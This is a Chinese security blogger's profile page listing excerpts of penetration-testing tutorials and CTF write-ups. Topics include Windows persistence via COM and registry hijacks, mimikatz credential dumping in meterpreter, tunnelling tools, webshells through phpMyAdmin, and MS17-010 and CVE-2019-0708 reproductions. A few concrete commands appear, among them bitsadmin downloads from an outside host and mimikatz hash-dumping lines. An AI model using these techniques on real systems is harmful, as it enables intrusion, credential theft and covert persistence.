浅笑⁹⁹⁶
码龄8年
关注
提问 私信
  • 博客:629,815
    629,815
    总访问量
  • 162
    原创
  • 2,342,071
    排名
  • 244
    粉丝
  • 1
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:山东省
  • 加入CSDN时间: 2016-10-12
博客简介:

浅笑996的博客

博客描述:
一个什么也不精通的白帽子
查看详细资料
个人成就
  • 获得259次点赞
  • 内容获得109次评论
  • 获得1,433次收藏
  • 代码片获得3,745次分享
创作历程
  • 26篇
    2020年
  • 10篇
    2019年
  • 139篇
    2018年
成就勋章
TA的专栏
  • WEB安全
    1篇
  • WEB基础
    25篇
  • SQL
    4篇
  • XSS
  • CSRF
    1篇
  • SSRF
    1篇
  • 文件包含漏洞
    1篇
  • 文件上传与解析漏洞
    3篇
  • 内网渗透
  • 代理转发
    5篇
  • 内网技巧
    15篇
  • 横向移动
    2篇
  • 权限维持
    4篇
  • CTF
    2篇
  • 安全开发
  • PHP
    1篇
  • JAVA
    1篇
  • Python
    23篇
  • 网络基础
    18篇
  • 漏洞复现
    41篇
  • 渗透实战
    2篇
  • 渗透工具
    19篇
  • Cobalt Strike
    7篇
  • 逆向
  • 其他
    2篇
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

使用digispark制作一个BadUSB

0X00、工具准备digispark开发板。淘宝连接:https://m.tb.cn/h.VK7vwjy?sm=d858440X01、安装Arduino IDE环境1、安装 arduino 的 IDE。下载地址:https://www.arduino.cc/en/Main/Software新版下载:https://downloads.arduino.cc/arduino-1.8.3-windows.zip2、下载驱动链接:http...
原创
发布博客 2020.07.03 ·
3680 阅读 ·
4 点赞 ·
3 评论 ·
33 收藏

wordpress在线检测主题和插件

http://wpthemedetector.coderschool.cn/http://www.wpthemedetector.com/http://whatwpthemeisthat.comhttp://whattheme.com/http://builtwith.com
原创
发布博客 2020.07.03 ·
1212 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

后门及持久化访问4----Com组件劫持

代码及原理介绍 COM是Component Object Model(组件对象模型)的缩写,COM组件由DLL和EXE形式发布的可执行代码所组成。每个COM组件都有一个CLSID,这个CLSID是注册的时候写进注册表的,可以把这个CLSID理解为这个组件最终可以实例化的子类的一个ID。这样就可以通过查询注册表中的CLSID来找到COM组件所在的dll的名称。所以要想COM劫持,必须精心挑选CLSID,尽量选择应用范围广的CLSID。这里,我们选择的CLSID为:{b5f8350b-0548...
原创
发布博客 2020.07.01 ·
1107 阅读 ·
1 点赞 ·
0 评论 ·
4 收藏

后门及持久化访问3----进程注入之AppInit_DLLs注册表项

进程注入之AppInit_DLLs注册表项User32.dll被加载到进程时,会获取AppInit_DLLs注册表项,若有值,则调用LoadLibrary() API加载用户DLL。只会影响加载了user32.dll的进程。HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls代码如下:#include #include using namespace std;int
原创
发布博客 2020.07.01 ·
804 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

后门及持久化访问2----进程注入之AppCertDlls 注册表项

代码及原理介绍如果有进程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec函数,那么此进程会获取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls注册表项,此项下的dll都会加载到此进程。Win7版本下没有“AppCertDlls”项,需自己创建。代码如下
原创
发布博客 2020.07.01 ·
1113 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

后门及持久化访问1----辅助功能镜像劫持

代码及原理介绍 为了使电脑更易于使用和访问,Windows添加了一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。一些常见的辅助功能如:C:\Windows\System32\sethc.exe 粘滞键 快捷键:按五次shift键 C:\Windows\System32\utilman.exe 设置中心 快捷键:Windows+U键 在较早的Wind...
原创
发布博客 2020.07.01 ·
562 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

meterpreter中使用mimikatz获取windows密码

进去meterpreter后getuid一下这获得系统管理员权限开始加载mimikatz模块load mimikatz加载成功.第一种方法:获取登录密码的hash值msv上面已经是得到hash值了. 下面算明文密码.获取明文密码kerberoslook...拿到登录的明文密码了.第二种方法:使用另一种方式获取哈希值mimikatz_command -f samdump::hashes根据上面的方式获取明文密码...
原创
发布博客 2020.07.01 ·
4284 阅读 ·
4 点赞 ·
0 评论 ·
30 收藏

端口转发工具--lcx

简介 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。使用1.将本地接口转发到远程主机的端口。攻击者ip:192.168.1.2受害者ip:192.168.1.3将lcx.exe上传到受害者主机..
原创
发布博客 2020.06.29 ·
1249 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏

内网代理工具--EarthWorm

一、简介 EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。从三项功能的角度可以这样划分 功能名称 对应模块 正向代理 ssocksd 反向代理 rcsoc...
原创
发布博客 2020.06.29 ·
2123 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

CVE-2019-0708 RCE复现

漏洞环境192.168.91.136 windows7 6.1.7601 192.168.91.151 kaliWindows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/复现过程1、首先升级MSFapt-get updateapt-get install metaspl...
原创
发布博客 2020.06.29 ·
663 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

内网代理工具--reGeorg

一、简介 reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。该文件下支持php,asp,jsp,aspx。 ProxyChains是kali中的一个代理工具下载地址: reGeorg https://github.com/sensepost...
原创
发布博客 2020.06.29 ·
2265 阅读 ·
0 点赞 ·
1 评论 ·
13 收藏

PhpMyadmin后台拿webshell方法总结

前言:phpmyadmin后台拿webshell的方法主要分为两个方法:(1) 、通过日志文件拿webshell;(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难);本地搭建环境:Phpmystudy 2018PHP--5.5.38一、日志文件写入一句话来获取webshell:(1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
原创
发布博客 2020.06.29 ·
3877 阅读 ·
2 点赞 ·
0 评论 ·
15 收藏

bitsadmin windwos自带下载命令

bitsadmin的四种下载文件的方法一、bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt三、bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\
原创
发布博客 2020.06.29 ·
582 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

内网穿透工具--frp

对于没有公网 IP 的内网用户来说,远程管理或在外网访问内网机器上的服务是一个问题。 今天给大家介绍一款好用内网穿透工具 FRP,FRP 全名:Fast Reverse Proxy。FRP 是一个使用 Go 语言开发的高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务。FRP 支持 TCP、UDP、HTTP、HTTPS等协议类型,并且支持 Web 服务根据域名进行路由转发。FRP 项目地址:https://github.com/fatedier/frp1、安装首先去frp的发
原创
发布博客 2020.06.29 ·
394 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

各种环境下反弹shell

0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp,详细参数如下-g<网关> 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。 -h 在线帮助。 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。 -l 使用监听模式,管
原创
发布博客 2020.06.29 ·
601 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

利用公网Msf+MS17010跨网段攻击内网

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。一、准备工作1.安装了Msf的公网主机+Ubuntu系统2.一台其他服务器内网存在445漏洞3.细心,细心,细心,钻研,钻研!!!二、反弹一个shell第一步:公网主机操作生成msf木马:msfvenom -p windows/meter
原创
发布博客 2020.06.29 ·
2673 阅读 ·
0 点赞 ·
1 评论 ·
8 收藏

FrameScan-GUI CMS漏洞扫描

工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。Github地址:https://github.com/qianxiao996/FrameScan-GUI下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases支持平台
原创
发布博客 2020.06.28 ·
1488 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

CTF--这好像不是文件上传

打开题目F12看到一个被注释的跳转。访问可以知道是一个文件包含经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。使用php://filter读取题目源码得到http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php读取upload.php文件源码如下:可以看出upload文件将上传..
原创
发布博客 2020.06.28 ·
732 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

CTF--Do you like xml

题目链接:http://47.94.221.39:8008/扫描目录得到/.DS_Store文件下载文件,直接用脚本进行还原操作。https://github.com/lijiejie/ds_store_exp打开backend文件直接搜索得到flag
原创
发布博客 2020.06.28 ·
367 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

FrameScan CMS漏洞扫描

工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多
原创
发布博客 2020.06.28 ·
775 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏
加载更多